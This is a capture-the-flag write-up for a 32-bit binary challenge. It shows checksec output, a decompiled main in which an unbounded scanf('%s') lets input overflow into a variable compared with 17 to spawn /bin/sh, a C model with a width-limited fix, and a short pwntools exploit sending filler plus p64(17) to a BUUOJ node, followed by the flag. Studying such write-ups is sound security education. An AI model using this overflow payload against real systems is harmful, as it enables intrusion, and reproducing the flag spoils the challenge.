Analysis
```
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
```
All protections are on.
Look at the logic in IDA:
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4;
  int v5;
  int var[15]; // declaration missing from the dump above; inferred from var[0..14] and *(_QWORD *)&var[13]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);       // no width limit: input longer than 52 bytes runs into var[13]
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )      // var[13..14] read as one 8-byte value
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0], var[1], var[2], var[3], var[4], var[5], var[6], var[7],
        var[8], var[9], var[10], var[11], var[12], var[13], var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}
```
The idea is simple: once var[13] == 17LL holds we get a shell, so just build the array contents directly:
var[13] is the 14th element, so 13 elements sit before it (hence the ×13); the ×4 is because each element is 4 bytes.
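To make the overflow mechanism concrete, here is a small C model written for this writeup (it is not the challenge binary's code): it reproduces the layout inferred from the decompiler dump, an `int var[15]` whose first 52 bytes hold the name and whose bytes 52..59 form the value compared with 17, and contrasts the unbounded `%s` read with a width-limited `%51s`. Since `sscanf` on a C string stops at a NUL, the constructed sample input carries 52 filler bytes and a single 0x11 byte and relies on the zeroed remainder of the array, whereas the exploit below sends `p64(17)` over the socket; the function and macro names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout assumed from the decompiler output (not copied from the binary):
 * var[0..12] (52 bytes) receive the name, var[13..14] form the 8-byte value
 * that main() compares with 17. */
#define VAR_INTS   15
#define NAME_BYTES (13 * sizeof(int))   /* 52: number of bytes before var[13] */

/* Constructed sample input: 52 filler bytes followed by 0x11 (= 17). */
const char *sample_payload(void) {
    static char buf[NAME_BYTES + 2];
    memset(buf, 'a', NAME_BYTES);
    buf[NAME_BYTES] = 0x11;
    buf[NAME_BYTES + 1] = '\0';
    return buf;
}

/* Model of the vulnerable read: "%s" has no width limit, so a long token
 * runs past the name field and lands in var[13]. */
int read_name_unbounded(int *var, const char *input) {
    memset(var, 0, VAR_INTS * sizeof(int));
    return sscanf(input, "%s", (char *)var);
}

/* Hardened read: "%51s" stores at most 51 bytes plus the terminating NUL,
 * which is exactly the 52-byte name field, so var[13] is never touched. */
int read_name_bounded(int *var, const char *input) {
    memset(var, 0, VAR_INTS * sizeof(int));
    return sscanf(input, "%51s", (char *)var);
}

/* The check from main(): *(_QWORD *)&var[13] == 17, read via memcpy. */
int val_is_17(const int *var) {
    uint64_t v;
    memcpy(&v, &var[13], sizeof v);
    return v == 17;
}

/* Returns 1: the unbounded read lets the sample input set var[13] to 17. */
int demo_unbounded(void) {
    int var[VAR_INTS];
    read_name_unbounded(var, sample_payload());
    return val_is_17(var);
}

/* Returns 0: with the width limit the same input leaves var[13] at zero. */
int demo_bounded(void) {
    int var[VAR_INTS];
    read_name_bounded(var, sample_payload());
    return val_is_17(var);
}

int main(void) {
    printf("scanf(\"%%s\")   : val is 17 -> %d\n", demo_unbounded());
    printf("scanf(\"%%51s\") : val is 17 -> %d\n", demo_bounded());
    return 0;
}
```

The width specifier is the one-line fix for this class of bug; `fgets` with `sizeof` of the name field would do the same job, and either way the comparison at var[13] can then only see the value the program itself stored there.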
exp
```python
from pwn import *

host = remote("node5.buuoj.cn", 29636)
# 13 ints * 4 bytes of filler reach var[13]; p64(17) then fills var[13..14] so the QWORD compares equal to 17
buf = b'a' * 13 * 4 + p64(17)
host.sendline(buf)
host.interactive()
```
flag{b11bc65e-7182-4b10-8f5e-90b8d95fe80c}